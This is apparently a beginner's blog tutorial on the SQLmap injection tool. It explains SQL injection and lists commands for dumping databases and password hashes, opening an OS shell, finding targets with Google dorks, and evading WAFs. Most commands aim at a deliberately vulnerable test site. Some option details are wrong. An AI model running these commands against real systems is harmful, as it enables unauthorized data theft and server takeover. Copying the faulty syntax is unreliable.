SQLmap — A Comprehensive Guide For Begineers

Anshulchoudhary
25 min readAug 5, 2023

--

SQLmap is a powerful open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It provides a comprehensive set of features that assist both security professionals and beginners in identifying and assessing database vulnerabilities. In this blog post, we will delve into the world of SQLmap and provide a step-by-step guide for beginners to effectively use this tool to secure web applications.

What is SQL injection

SQL injection is a type of attack in which an attacker can inject malicious code into a SQL query. This can be done by entering specially crafted input into a web application that is not properly sanitized. The malicious code can then be executed by the database server, which can allow the attacker to gain access to sensitive data, modify data, or even take control of the database server.

For example, consider a web application that allows users to search for products by category. The application might have a search box where users can enter the name of a category. The application then uses this input to construct a SQL query to search the database for products in the specified category.

SELECT * FROM products WHERE category = '?'
If the application does not properly sanitize the input, an attacker could enter a malicious string like this:
' OR 1 = 1

This string will cause the SQL query to become:

SELECT * FROM products WHERE category = '' OR 1 = 1

The OR operator will always return true, so this query will return all of the products in the database, regardless of the category that the user entered.

SQL injection can be a very serious security vulnerability. It can allow attackers to gain access to sensitive data, modify data, or even take control of a database server. To prevent SQL injection, it is important to properly sanitize all user input before using it to construct SQL queries.

Here are some tips for preventing SQL injection:

  • Use prepared statements instead of dynamic SQL.
  • Sanitize all user input before using it in a SQL query.
  • Use a web application firewall (WAF) to help protect against SQL injection attacks.

What is SQLmap

SQLmap is a powerful open-source penetration testing tool that specializes in detecting and exploiting SQL injection vulnerabilities in web applications. SQL injection is a common attack technique where an attacker can manipulate the SQL queries sent to a database through user input fields on a website. By exploiting these vulnerabilities, attackers can gain unauthorized access to the database, extract sensitive information, modify data, or even execute arbitrary commands.

SQLmap automates the process of identifying and exploiting SQL injection vulnerabilities, making it easier for security professionals and penetration testers to assess the security of web applications. It supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and others.

Key Features of SQLmap

  • Detection of SQL Injection: SQLmap automatically detects SQL injection vulnerabilities in web applications by analyzing the response from the application server.
  • Exploitation: Once a SQL injection vulnerability is identified, SQLmap can exploit it to extract information from the database, such as usernames, passwords, and sensitive data.
  • Fingerprinting: SQLmap can determine the type and version of the database management system being used, which helps in selecting appropriate exploit techniques.
  • Enumeration: SQLmap can retrieve information about the database structure, tables, columns, and data types, allowing testers to gain a deeper understanding of the target application’s database.
  • Brute Forcing: SQLmap includes the capability to perform automated brute forcing attacks to guess usernames and passwords in the database.
  • Post-exploitation: Once access to the database is gained, SQLmap enables further exploitation by executing arbitrary commands or uploading malicious files to the server.

Using SQLmap responsibly and ethically is crucial, as it can be misused for unauthorized activities. It is recommended to obtain proper authorization and consent before performing any security assessments using SQLmap or any other penetration testing tool.

Prerequisites For SQLmap

When using SQLmap, there are a few prerequisites that need to be met. Here are the common prerequisites for using SQLmap:

  • Operating System:
  1. SQLmap is compatible with multiple operating systems, including Windows, Linux, and macOS.
  2. Ensure that you are using a supported operating system.
  • Python:
  1. SQLmap is written in Python, so you need to have Python installed on your machine.
  2. Check if Python is installed by opening a command prompt or terminal and typing python — version or python3 — version. If Python is not installed, download and install the latest version from the official Python website (https://www.python.org).
  • Internet Connectivity:
  1. SQLmap relies on internet connectivity to fetch the latest updates, exploit techniques, and perform certain tasks.
  2. Ensure that your machine has a stable internet connection while using SQLmap.

SQLmap Installation

SQLmap can be installed using the pip package manager, which is bundled with Python.

STEP 1

Open a command prompt or terminal

STEP 2

Install python by running following command :

sudo apt install python3

And

sudo apt install python

STEP 3

Type the following command to install SQLmap using pip:

OR

pip3 install sqlmap

STEP 4

After the installation is complete, you can verify the SQLmap installation by typing sqlmap — version in the command prompt or terminal.

If the SQLmap version is displayed, it means SQLmap is installed successfully.

Running SQLmap

You can start SQLmap by running following command :

sqlmap -h

where h Flag is used for help , it will show you all commands and flags that you can use in this tool

here you will counter with some flags you can use lets understand it’s meaning in next heading .

Understanding SQLmap

when you start sqlmap you will counter with many options that you are not familiar with , so we will understand all the options in detail so we will not face any understanding problems in our scanning phase:

  • Verbosity :

In SQLMap, the ‘-v’ option is used to control the level of detail in the output generated by the tool. It allows you to adjust the verbosity or the amount of information displayed during the scanning process.

The ‘-v’ option accepts an integer value ranging from 0 to 3, with 0 being the lowest level of verbosity and 3 being the highest. Here’s a breakdown of the levels:

  • Level 0: Only critical information and minimal output are displayed.
  • Level 1: Displays basic information, such as HTTP requests and the target URL.
  • Level 2: Provides more detailed information, including payload data and the results of each request.
  • Level 3: Shows extensive debugging information, such as the HTTP headers and payload sent.

To set the verbosity level, you would use the -v option followed by the desired level. For example:

sqlmap -v 2

This command would set the verbosity level to 2, which provides a moderate amount of detail during the scanning process. You can adjust the value to your preference, depending on the amount of information you need for analysis or debugging purposes.

  • Giving Target URL :

In SQLMap, the ‘-u’ option is an abbreviated form of ‘ — url’. It is used to specify the target URL of the web application you want to scan for SQL injection vulnerabilities.

When utilizing the ‘-u’ option, you provide the complete URL of the target web application, including the protocol (e.g., http:// or https://) and the specific page or endpoint you wish to test. Here’s an example:

sqlmap -u http://example.com/login.php

In the above command, SQLMap is instructed to scan the ‘login.php’ page of the ‘example.com’ website for SQL injection vulnerabilities.

Similarly to the ‘ — url’ option, the ‘-u’ option can also accept additional parameters in the URL, such as query strings or form data, if applicable to your testing scenario. For example:

sqlmap -u "http://example.com/search.php?query=test&page=1"
In this case, SQLMap is targeting the 'search.php' page of the 'example.com' website, with the 'query' and 'page' parameters being part of the URL's query string.
  • Using Google Dorks :

In SQLMap, the ‘-g’ option is used to automatically parse a provided Google search result page and extract potential URLs for SQL injection testing. It allows SQLMap to scrape search engine results and use the identified URLs as targets for SQL injection vulnerability analysis.

When using the ‘-g’ option, you provide a specific search query enclosed in double quotes. SQLMap will then perform a Google search using the provided query and retrieve the search results. It will parse the search result page and extract URLs for further testing. Here’s an example:

sqlmap -g "inurl:index.php?id="

In the above command, SQLMap performs a Google search with the query ‘inurl:index.php?id=’. It identifies search results that include URLs containing ‘index.php?id=’ and automatically extracts those URLs for SQL injection testing.

The ‘-g’ option can be a convenient way to automate the process of finding potential targets for SQL injection testing by leveraging search engines. However, it’s important to use this option responsibly and respect search engine usage policies to avoid any potential issues.

  • Sending Data strings through post requests :

In SQLMap, the ‘ — data’ option is used to specify the data parameters to be sent in the request body when performing ‘HTTP POST’ requests during the SQL injection testing process. It allows you to provide the necessary data for simulating form submissions and testing for SQL injection vulnerabilities in ‘POST-based’ scenarios.

When using the ‘ — data’ option, you provide the data parameters in the form of key-value pairs, similar to how you would construct a form submission. The data is typically URL-encoded. Here’s an example:

sqlmap -u http://example.com/login.php --data="username=admin&password=12345"

In the above command, SQLMap is instructed to target the ‘login.php’ page of the example.com website using an HTTP POST request. The ‘ — data’ option provides the data parameters ‘username=admin’ and ‘password=12345’, which simulate a form submission for the login functionality.

By including the — data option with the appropriate parameter values, SQLMap can interact with the web application and perform SQL injection testing in scenarios where POST requests are involved.

  • Customized Cookie :

In SQLMap, the ‘ — cookie’ option is used to provide a specific cookie value to be included in the HTTP requests sent during the SQL injection testing process. It allows you to simulate authenticated sessions or provide session-specific information to SQLMap.

When using the — cookie option, you provide the cookie value in the format of key-value pairs, similar to how cookies are typically represented in HTTP requests. Here’s an example:

sqlmap -u http://example.com/login.php --cookie="sessionid=abc123; user=admin"

In the above command, SQLMap is instructed to target the login.php page of the example.com website and include a specific cookie in the HTTP requests. The — cookie option provides the cookie value sessionid=abc123; user=admin, which is used to simulate an authenticated session with the provided session ID and user information.

By utilizing the — cookie option, you can provide session-specific information to SQLMap, which may be necessary to accurately test SQL injection vulnerabilities in authenticated or session-dependent scenarios.

  • Randomized User Agent :

In SQLMap, the — random-agent option is used to randomize the user agent string in the HTTP headers of the requests sent during the SQL injection testing process. It allows SQLMap to mimic different user agents, making the requests appear more diverse and potentially evading detection or bypassing certain security measures.

When using the — random-agent option, SQLMap will automatically select a random user agent string from a predefined list and include it in the requests it sends. This can help disguise the identity of SQLMap and make it appear as if the requests are originating from various web browsers or clients. Here’s an example:

sqlmap -u http://example.com/login.php --random-agent

In the above command, SQLMap is instructed to target the login.php page of the example.com website and enable the — random-agent option. This will result in SQLMap randomly selecting a user agent string from its list and using it in the requests sent during the SQL injection testing.

By using the — random-agent option, SQLMap enhances its ability to avoid detection or bypass certain security mechanisms that might be specifically targeting default user agent strings associated with automated scanning tools.

  • Using Proxies :

In SQLMap, the — proxy option is used to specify a proxy server through which the HTTP requests will be routed during the SQL injection testing process. It allows SQLMap to pass the requests through a proxy server, which can be helpful for various purposes such as capturing and analyzing network traffic, bypassing network restrictions, or testing security controls.

When using the — proxy option, you provide the details of the proxy server in the form of <proxy type>:<proxy address>. Here’s an example:

sqlmap -u http://example.com/login.php --proxy="http:127.0.0.1:8080"

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use the proxy server located at 127.0.0.1 on port 8080. The proxy type specified is http, indicating that an HTTP proxy server should be used.

By specifying the — proxy option, SQLMap will route its HTTP requests through the specified proxy server, allowing you to capture and analyze the traffic, apply additional security controls, or bypass network restrictions that may be in place.

  • Using TOR :

In SQLMap, the — tor option is used to route the tool’s HTTP requests through the Tor network during the SQL injection testing process. It allows SQLMap to leverage the Tor network’s anonymity features to anonymize its requests and potentially bypass certain network restrictions or enhance privacy.

When using the — tor option, SQLMap will automatically configure its requests to be routed through the Tor network. This helps to obfuscate the source of the requests and makes it harder to trace them back to the original IP address. Here’s an example:

sqlmap --url=http://example.com/login.php --tor

In the above command, SQLMap is instructed to target the login.php page of the example.com website and enable the — tor option. This will ensure that SQLMap’s requests are routed through the Tor network.

By leveraging the Tor network, SQLMap can potentially bypass IP-based restrictions or filtering mechanisms that may be in place. It also adds an extra layer of anonymity to the SQL injection testing process, making it more difficult to track the origin of the requests.

It’s important to note that using the — tor option requires that you have Tor installed and running on your system. Additionally, the effectiveness of the Tor network in anonymizing your requests can vary depending on various factors, such as the configuration and security measures implemented by the target website.

  • TestParameters :

In SQLMap, the -p option is used to specify the parameter(s) to be tested for SQL injection vulnerabilities. It allows you to identify and target specific parameters within the target URL or data payload for vulnerability testing.

When using the -p option, you provide the name of the parameter(s) you want to test. Here’s an example:

sqlmap -u http://example.com/login.php -p username,password

In the above command, SQLMap is instructed to target the login.php page of the example.com website and test the username and password parameters for SQL injection vulnerabilities.

By using the -p option, you can focus SQLMap’s testing efforts on specific parameters rather than scanning the entire target URL or data payload. This is useful when you have identified particular parameters that may be more susceptible to SQL injection or want to narrow down the scope of the vulnerability analysis.

It’s important to note that the parameter names provided with -p should correspond to the actual parameter names used in the target URL or data payload. Additionally, you can specify multiple parameters by separating them with commas, as shown in the example above.

  • Force Back-End DBMS :

In SQLMap, the — dbms option is used to specify the database management system (DBMS) that the target web application is using. It allows SQLMap to tailor its SQL injection tests and payloads to the specific DBMS, increasing the effectiveness and accuracy of the vulnerability analysis.

When using the — dbms option, you provide the name of the DBMS as the argument. Here’s an example:

sqlmap --url=http://example.com/login.php --dbms=mysql

In the above command, SQLMap is instructed to target the login.php page of the example.com website and assumes that the web application is using the MySQL DBMS.

By specifying the correct DBMS with — dbms, SQLMap can optimize its techniques and payloads to exploit known vulnerabilities and specific behaviors associated with that particular DBMS. It allows for more accurate and targeted testing, increasing the chances of discovering SQL injection vulnerabilities.

  • Level and Risk :

In SQLMap, the — level and — risk options are used to control the intensity and aggressiveness of the SQL injection testing process.

The — level option determines the depth of the SQL injection tests and the number of techniques used. It ranges from 1 to 5, with 1 being the least aggressive and 5 being the most aggressive. Higher levels increase the testing coverage and the likelihood of discovering vulnerabilities but can also result in increased false positives. Here’s an example:

sqlmap --url=http://example.com/login.php --level=3

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use a moderate testing level of 3.

The — risk option determines the likelihood of triggering false positives during the SQL injection tests. It ranges from 1 to 3, with 1 being the least risky and 3 being the most risky. Higher risk levels increase the chances of detecting SQL injection vulnerabilities but may also generate more false positives. Here’s an example:

sqlmap — url=http://example.com/login.php — risk=2

In the above command, SQLMap is instructed to target the login.php page of the example.com website and use a medium risk level of 2.

By adjusting the — level and — risk options, you can fine-tune the SQL injection testing process based on the specific requirements and risk tolerance of the testing scenario. It allows you to balance the thoroughness of the tests with the potential for false positives.

  • Techniques :

In SQLMap, the — technique option is used to specify the SQL injection technique(s) to be employed during the testing process. It allows you to select specific techniques that SQLMap will use to identify and exploit SQL injection vulnerabilities.

When using the — technique option, you provide the name of the technique(s) as the argument. Here’s an example:

sqlmap --url=http://example.com/login.php --technique=UNION

In the above command, SQLMap is instructed to target the login.php page of the example.com website and employ the UNION-based technique to test for SQL injection vulnerabilities.

SQLMap offers multiple techniques to detect and exploit SQL injection vulnerabilities, such as UNION-based, Boolean-based, time-based, error-based, and more. By specifying the appropriate technique(s) with — technique, you can focus the testing efforts on specific techniques known to be effective against the target application.

sqlmap --url=http://example.com/login.php --technique=UNION,BLIND

In the above command, SQLMap will use both the UNION-based and BLIND-based techniques during the SQL injection testing process.

It’s important to note that the choice of technique(s) depends on the characteristics and behavior of the target application. It may require some experimentation and trial and error to determine the most effective technique(s) for a specific scenario.

  • Enumeration :

Here’s a brief explanation of the options in SQLMap along with an example for each:

‘-a’ (or — all): Executes all tests and enumeration available. It performs a comprehensive analysis of the target. Example :

sqlmap -u http://example.com/login.php -a

‘-b’ (or — banner): Retrieves the DBMS banner from the target, providing information about the database management system. Example :

sqlmap -u http://example.com/login.php -b

‘ — current-user’: Retrieves the username of the current database user. Example :

sqlmap -u http://example.com/login.php --current-user

‘ — current-db’: Retrieves the name of the current database. Example :

sqlmap -u http://example.com/login.php --current-db

‘ — passwords’: Retrieves password hashes from the target database. Example:

sqlmap -u http://example.com/login.php --passwords

‘ — dbs’: Enumerates the names of the databases on the target server. Example:

sqlmap -u http://example.com/login.php --dbs

‘ — tables’: Enumerates the names of the tables within a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --tables

‘ — columns’: Enumerates the names of the columns within a specified table. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --columns

‘ — schema’: Dumps the database schema of a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --schema

‘ — dump’: Dumps the contents of a specified table. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --dump

‘ — dump-all’: Dumps the contents of all tables in a specified database. Example:

sqlmap -u http://example.com/login.php -D dbname --dump-all

‘-D’ (or — database): Specifies the target database to be used in various operations. Example:

sqlmap -u http://example.com/login.php -D dbname --tables

‘-T’ (or — table): Specifies the target table to be used in various operations. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename --columns

‘-C’ (or — columns): Specifies the target column(s) to be used in various operations. Example:

sqlmap -u http://example.com/login.php -D dbname -T tablename -C column1,column2

These examples demonstrate how to use the various options in SQLMap to perform tasks such as retrieving information, enumerating databases, tables, and columns, dumping data from tables, and more.

  • OS Shell :

When using the — os-shell option, SQLMap will attempt to execute commands on the target system’s operating system, providing an interactive shell interface. This can be a powerful feature, as it allows you to execute operating system commands and interact with the target machine directly from within SQLMap.

Here’s an example of how to use the — os-shell option:

sqlmap --url=http://example.com/login.php --os-shell

In the above command, SQLMap is instructed to target the login.php page of the example.com website and launch an operating system shell if a successful SQL injection exploit is detected.

Once the — os-shell option is triggered, you can interact with the target machine’s operating system using command-line commands. This can include tasks such as executing shell commands, navigating the file system, modifying files, or running system-level utilities.

  • Batch Flag :

When using the — batch option, SQLMap will automatically select default options and proceed with the testing process without any prompts for user input. It is useful for automating SQLMap as part of a larger script or for running SQLMap in non-interactive environments.

Here’s an example of how to use the — batch option:

sqlmap --url=http://example.com/login.php --batch

In the above command, SQLMap is instructed to target the login.php page of the example.com website and run in batch mode, without requiring any user interaction.

Scanning With SQLmap

When scanning with SQLMap, the tool utilizes various techniques to analyze the target application’s responses and behavior. It starts by probing the application for potential SQL injection points and then proceeds to exploit them by sending crafted SQL queries. SQLMap supports different types of SQL injection attacks, including error-based, union-based, and time-based techniques.

NORMAL SCANNING

Simple HTTP-GET Based Scan

To perform a simple HTTP GET-based test with SQLMap, you can use the following command:

sqlmap -u <target_url>

Replace <target_url> with the URL of the web application you want to test. For example:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

The command sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 — batch initiates an automated SQL injection scan using SQLMap against the specified URL, running in batch mode without user prompts, and saving the results to a file.

OUTPUT

This command instructs SQLMap to send GET requests to the specified URL and check for SQL injection vulnerabilities. SQLMap will automatically analyze the responses, detect any injection points, and attempt to exploit them using various techniques.

By default, SQLMap uses a set of predefined tests and payloads to identify and exploit SQL injection vulnerabilities. It will gather information from the target database, such as the DBMS, tables, columns, and data, depending on the level of access it gains.

WAF Evasion scan

Performing Web Application Firewall (WAF) evasion with SQLMap involves using techniques and parameters that can help bypass or overcome the security measures implemented by the WAF. Here’s an overview of some common commands and techniques used for WAF evasion in SQLMap:

  • Tamper Scripts :

SQLMap provides a variety of tamper scripts that modify the generated SQL payloads to evade detection. These scripts alter the payload’s structure, encoding, or other attributes to bypass WAF filters. The — tamper option is used to specify a tamper script.

sqlmap -u <target_url> — tamper=<tamper_script>

For example, you can use the apostrophemask tamper script to encode single quotes in different ways:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tamper=apostrophemask --batch

OUTPUT

DETECTION

  • Randomization:

SQLMap can randomize the order of the injected payload to evade signature-based detection. The — random-agent option is used to randomize the User-Agent header.

sqlmap -u <target_url> — random-agent

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --random-agent

OUTPUT

  • Delayed Requests :

Introducing delays between requests can help bypass time-based WAF protections. The — delay option adds a delay between each request.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 — delay=0.20

The command you provided will initiate a SQLMap scan against the target URL http://testphp.vulnweb.com/listproducts.php?cat=1 with a delay of 0.20 seconds between each request. This delay is introduced to avoid triggering any rate-limiting or detection mechanisms.

By executing this command, SQLMap will start scanning the specified URL for potential SQL injection vulnerabilities. It will send a series of requests with different payloads, analyzing the responses to identify potential injection points. The specified delay of 0.20 seconds between each request will be observed to minimize the risk of detection and to ensure that the target application can handle the load.

  • Encoding Techniques :

SQLMap provides encoding techniques to obfuscate the injected payloads. The — hex option converts the payloads into hexadecimal representation, while the — tamper=base64encode option encodes payloads using base64.

sqlmap -u <target_url> — hex

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --hex

By executing this command, SQLMap will start scanning the specified URL while encoding the injected payloads using hexadecimal representation. This encoding technique can help obfuscate the SQL injection payloads, potentially bypassing certain security filters or detection mechanisms that may be in place.

  • HTTP Header Manipulation :

Modifying HTTP headers can help bypass certain WAF restrictions. The — headers option allows you to specify custom headers.

sqlmap -u <target_url> — headers=”X-Custom-Header: value”

For example,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --headers="CustomHeader: testing"

is a valid SQLMap command that includes the — headers option to add a custom header to the HTTP request. This command instructs SQLMap to test the URL http://testphp.vulnweb.com/listproducts.php?cat=1 for SQL injection vulnerabilities, while including the custom header CustomHeader: testing in the HTTP request.

Level and Risk

In this part we will discuss about the options called level and risk in sqlmap , so firstly we wil discuss all levels of level and risk .

— LEVEL

  • Level 1 ( — level=1) :

Performs basic SQL injection tests. It includes simple payload checks and minimal impact on the target application.

sqlmap -u <target_url> — level=1

  • Level 2 ( — level=2) :

Extends the tests to more SQL injection techniques, such as time-based and error-based blind SQL injections. It increases the number of tests performed.

sqlmap -u <target_url> — level=2

  • Level 3 ( — level=3) :

Further expands the tests to cover more advanced SQL injection techniques and algorithms. It increases the number of requests made to the target application.

sqlmap -u <target_url> — level=3

  • Level 4 ( — level=4) :

Performs thorough tests, including deep analysis and in-depth detection of SQL injection vulnerabilities. It may significantly impact the target application’s performance.

sqlmap -u <target_url> — level=4

  • Level 5 ( — level=5) :

This is the highest level, involving the most comprehensive and exhaustive tests. It combines all available SQLMap techniques and payloads, covering a wide range of injection scenarios.

sqlmap -u <target_url> — level=5

— RISK

  • Risk 1 ( — risk=1) :

Performs low-risk tests, reducing the chance of affecting the target application while still aiming to identify vulnerabilities.

sqlmap -u <target_url> — risk=1

  • Risk 2 ( — risk=2) :

Strikes a balance between risk and thoroughness. It increases the aggressiveness of the scanning process, potentially identifying more vulnerabilities.

sqlmap -u <target_url> — risk=2

  • Risk 3 ( — risk=3) :

Performs high-risk tests, increasing the chances of exploiting potential vulnerabilities. It might have a greater impact on the target application.

sqlmap -u <target_url> — risk=3

for example ,

sqlmap -u http://example.com/listproducts.php?cat=1 --level=3 --risk=2 --batch

By executing this command, SQLMap will start scanning the specified URL with the specified level (3) and risk (2). The batch mode will ensure that the scan runs without requiring user input, making it suitable for automated or scripted scanning.

Retrieving Information

— DBS

This command retrieves the list of available databases on the target server. It identifies the databases present in the database management system (DBMS).

sqlmap -u <target_url> — dbs

for example ,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs --batch

OUTPUT

DETECTION

By executing this command, SQLMap will initiate the scan against the specified URL and retrieve the list of databases present on the target server. The batch mode ensures that the scan runs without requiring user input, making it suitable for automated or scripted scanning.

This output gives us two database :

  • aquart
  • information_schema

Now let’s dump it’s tables .

— TABLES -D ( DB NAME )

This command fetches the list of tables within a specified database. It helps you identify the tables present in the selected database.

sqlmap -u <target_url> — tables -D <database>

for example ,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

OUTPUT

this out put gives us 8 tables :

  • artists
  • carts
  • categ
  • featured
  • guestbook
  • pictures
  • products
  • users

lets dump users table’s columns

— COLUMNS -D <DATABASE> -T <TABLE>:

This command retrieves the columns within a specified table of a database. It helps you identify the columns present in the selected table.

sqlmap -u <target_url> — columns -D <database> -T <table>

for example ,

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -D aquart -T users --batch

The command you provided will initiate a SQLMap scan against the target URL http://testphp.vulnweb.com/listproducts.php?cat=1 with the — columns option enabled. It will retrieve the columns within the specified table of the selected database. The database is set to aquart and the table is set to users. The — batch option is included to enable batch mode, suppressing unnecessary output and prompts.

OUTPUT OF DATABASE

To save the output to a file, you can use the shell redirection operator (> or >>).

>: Redirects the output to a new file, replacing the contents of the file if it already exists. If the file doesn’t exist, it will be created.

sqlmap -u <target_url> — dump -D <database> -T <table> — batch > output.txt

>>: Redirects the output to a file, appending the output to the end of the file if it exists. If the file doesn’t exist, it will be created.

sqlmap -u <target_url> — dump -D <database> -T <table> — batch >> output.txt

Scanning request TXT files

Scanning POST and GET HTTP request files in SQLMap involves using the -r option to specify the request files. Let’s go through the commands step by step:

  • Scanning POST HTTP Request File :

To scan a POST HTTP request file, follow these steps:

  • Save the HTTP POST request into a file, such as post_request.txt, with the necessary headers, parameters, and body intact.

POST REQUEST FILE

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testphp.vulnweb.com/comment.php?aid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
name=hacklock&comment=hey+u+are+hacked+&Submit=Submit&phpaction=echo+%24_POST%5Bcomment%5D%3B
  • Run SQLMap with the -r option followed by the path to the POST request file :

sqlmap -r post_request.txt

In both cases, the -r option allows SQLMap to read the HTTP request from the specified file and use it as a basis for the scanning process. This is useful when dealing with complex requests or scenarios where you want to manually modify the request before scanning.

Making a Report on Vulnerability

we are demonstrating a sql vuln report for you’ll guys to give exposure to you .

Report on Boolean-based SQL Vulnerability

  • Introduction:

This report aims to highlight the presence of a boolean-based SQL injection vulnerability on the website

http://testphp.vulnweb.com/listproducts.php?cat=1. The vulnerability allows attackers to manipulate the underlying SQL queries by exploiting insufficient input validation, potentially leading to unauthorized data access or manipulation.

  • Vulnerability Description:

The boolean-based SQL injection vulnerability is a type of SQL injection attack that leverages the application’s response to Boolean-based queries. By crafting malicious input, an attacker can infer the presence of a vulnerability and exploit it to extract sensitive information or perform unauthorized operations on the database.

  • Vulnerable URL:

http://testphp.vulnweb.com/listproducts.php?cat=1

  • Proof of Concept (PoC):

To demonstrate the vulnerability, the following example uses a simple boolean-based SQL injection payload that aims to extract the version of the database management system.

Example Payload: ‘ OR 1=1 — -

Steps to Reproduce:

http://testphp.vulnweb.com/listproducts.php?cat=' OR 1=1 — -

  • Observe the response from the website. If the page displays the same content as the original page, it indicates a successful boolean-based SQL injection.

Impact:

The boolean-based SQL injection vulnerability can have severe consequences, including:

  • Unauthorized access to sensitive information, such as user credentials, personal data, or financial records.
  • Modification, addition, or deletion of data within the database.
  • Complete compromise of the application, allowing further exploitation and attacks.

Mitigation:

To address the boolean-based SQL injection vulnerability, the website’s developers should follow these best practices:

  • Implement input validation and parameterized queries to prevent SQL injection attacks.
  • Apply the principle of least privilege to restrict database access for application users.
  • Regularly update and patch the underlying database management system and web application.
  • Conduct regular security testing, including vulnerability assessments and penetration testing.

Conclusion:

The presence of a boolean-based SQL injection vulnerability on the website http://testphp.vulnweb.com/listproducts.php?cat=1 poses significant security risks. It allows attackers to manipulate SQL queries and potentially compromise sensitive data. It is crucial for the website’s developers to promptly address this vulnerability by implementing secure coding practices and conducting regular security assessments.

Note: This report is intended for educational purposes and has been responsibly disclosed to raise awareness about the importance of secure coding and vulnerability management. Always obtain proper authorization before conducting security testing on websites or applications.

Conclusion

In conclusion, SQLmap is a powerful and versatile tool that offers a comprehensive solution for beginners seeking to understand and identify SQL injection vulnerabilities. Throughout this guide, we have explored the fundamentals of SQL injection, its potential risks, and how attackers can exploit it to gain unauthorized access to sensitive databases.

With SQLmap, beginners can dive into the world of web application security and put their newfound knowledge to practical use. The tool’s user-friendly interface and extensive set of features make it accessible even to those with limited prior experience in penetration testing.

We have learned how to initiate basic scans, retrieve database information, and dump data from vulnerable applications. Additionally, we explored more advanced options, such as WAF evasion and customization using HTTP headers.

However, it is crucial to emphasize the importance of ethical use and responsible disclosure when using SQLmap or any other security tool. Always seek proper authorization before scanning or testing any web application, as unauthorized actions could lead to legal consequences.

As beginners continue their journey into the realm of cybersecurity, it is essential to keep learning, stay updated with the latest security trends, and follow best practices for secure coding and application development. Regularly engaging in cybersecurity communities and forums can help expand knowledge and foster a sense of community among enthusiasts.

Ultimately, SQLmap is not just a tool for beginners but a valuable asset for security professionals and organizations seeking to fortify their web applications against SQL injection attacks. By learning to identify vulnerabilities and apply remediation strategies, individuals can contribute to a safer and more secure digital landscape.

In conclusion, this guide is just the beginning of an exciting journey into the vast world of cybersecurity. Armed with the knowledge gained from this comprehensive guide, beginners can take their first steps towards becoming skilled defenders against the ever-evolving threats of the digital world. Let’s continue to learn, explore, and collaborate to build a more resilient and secure cyberspace for all. Happy Ethical hacking!

--

--

Anshulchoudhary

Hey, my name is Anshul Choudhary, A convergent Thinker who values processes as well as a dependable individual who enjoys learning. A man who enjoys innovating